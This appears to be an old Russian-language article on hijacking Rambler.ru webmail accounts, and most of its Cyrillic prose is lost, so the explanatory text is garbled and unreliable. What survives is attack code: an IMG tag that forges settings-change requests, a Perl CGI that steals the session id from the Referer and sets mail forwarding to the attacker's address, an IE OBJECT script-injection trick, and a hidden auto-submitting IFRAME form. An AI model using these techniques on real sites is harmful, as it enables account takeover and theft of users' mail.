  -     rambler.ru
Hi, ALL. 
 
 , ,  ,    ,         .       , ..       ,    . :)         , ..  ,      . 
 
       Web- (Rambler, HotBox  ..)  ,          - (HTTP),  IE,      (POP, SMTP). 
 
  Web-   ,    -.           ,      . ..        ,  Rambler,          Web-.            ,          . 
 
 :      /   .  ,          ,  , ,  .. ,   :   HTTP, Cookies, JScript, Perl (  'Hello world!'),   IE.    IE,    Web-            (    hut.ru, bip.ru  ..). 
 
         Rambler.ru     . 
 
-   Rambler'e   :  ,  cookie,    IP-        ,       ,      .   ,    'Submit',      POST     (  'settings.cgi'),  ,    ,    ,   cookie  IP-.  ,        POST,   GET.  ''     :    : 
 
HTML
<IMG SRC="www.server.ru/settings.cgi?set1=x&set2=y">

 set1=x, set2=y -      . 
 
         ,         'SRC=' ,       cookie  IP- .    ,    ( POST,  GET), ,     ,  ,   . ,     ,       ,    ,       1x1. 
 
    "password='my_password'",        , ..  ,   ,   , ..     : "password='my_password'&oldpassword='old_password'".     ,         ,    ,        .    . 
 
                .         ,       ,      -. ..       ""     ,              .       ?       ?     ,      Web-   ... 
 
,     ,     .   cookie, IP-        ,         'id=',             GET       (      'Address' ).          ,    POST,   GET,     ,       ,           .    - .     id  document.location      , ..     .   ,       CGI 'HTTP_REFERER'.  :   'IMG',          .       Perl (        CGI-  CGI-)      .   : 
 
Perl
$ref = $ENV{'HTTP_REFERER'};         #  URL
$ref =~ /^.*\?id=([A-za-z0-9]*)\&/s; #  
$mail = 'my_mail@mail.ru';           # e-mail    
 
#   GET
$url = "http://www.server.ru/settings.cgi?id=$1&mailredir=$mail&self=yes; 
 
print "Content-Type: text/html\n\n";
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL=$url\">";
print "</HEAD></HTML>";
 

 :      ,    ,    .   ,    CGI- 'HTTP_REFERER',   URL ,      "",   GET-. ..      id -  .          :  (id),   (mailredir)      (self).      -        . ,   ,  ,   ,     . 
 
         - URL      : "www.server.ru/redirect.cgi?url='some_url'". ..           (redirect.cgi),      'some_url'  ..    id  'HTTP_REFERER', ..          (www.server.ru/redirect.cgi),   . ..    - . 
 
 ,       , ..   POST  GET.     ,     ,       .    :     , ..        ,    ,        .    ,   ,    ,       ,-   ,           .  ,     ,    .      ? 
 
    -  . ,         ,     '<OBJECT>'. ,   ?                .          .    : 
 
HTML
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389> 
 
<PARAM NAME="URL"
              VALUE="about:<SCRIPT>alert(document.location);</SCRIPT>">
</OBJECT>

 :       ,        MessageBox  URL ,      id. 
 
        JScript,       POST  (    ).   'write()'                         JScript  'Submit'. 
 
   : ,     ,   ,          .             ,       (<IFRAME>)  1x1.   , ,  ,          ,    , ..     .   ,   onload    : 
 
HTML
<IFRAME SRC="about:
<HTML>
<BODY onload='javascript:forms(0).submit();'>
<FORM METHOD='POST'>
...............
</FORM>
</BODY>
</HTML>
">

  ,  "" ,           ,     ,     .  ,  ""    (  -      ),  ,     . 
 
 ,     ,  :   CGI-,        ,       <IMG>    .   ,   ,       ,    . ,  .  - . 
 
    ,         Rambler'e...        .      : ,    ""       Rambler'e,     Rambler'e   , ..      .    ,         Rambler'e    ,      ,          . 
 
", ,  ,     ..." (-, " ") 
 
:
Georgi Guninski Security Research http://www.guninski.com/